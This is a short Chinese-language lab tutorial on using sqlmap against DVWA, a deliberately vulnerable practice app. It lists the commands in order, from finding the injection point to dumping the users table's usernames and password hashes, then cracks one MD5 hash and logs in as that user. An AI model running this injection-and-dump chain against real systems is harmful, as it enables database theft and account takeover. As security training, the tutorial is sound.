工具使用 | sqlmap的簡單使用–以DVWA為靶場

  • 2019 年 10 月 7 日
  • 筆記

0x00 找到注入點

http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap進行注入

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期間會遇到一些詢問,可以自己判斷是還是否,也可以一路回車,最後將會顯示出靶機的一些相關信息,比如數據庫版本、系統類型等

利用—dbs參數獲取數據庫信息

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  --dbs

利用-D指定數據庫,—tables查看該數據庫下所有表

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa --tables

利用-T指定表,—colums查看該表下所有列

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users --columns

最後利用-C指定列,—dump進行脫褲

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users -C user,password --dump

對密碼的MD5值進行解密,這裡以pablo用戶的密碼MD5值為例

0x02 利用爆出的用戶名密碼登陸系統

利用Sqlmap爆出的用戶pablo,密碼letmein進行登陸

成功登陸,關於sqlmap的用法還有很多,這裡只介紹了最為常見的一種。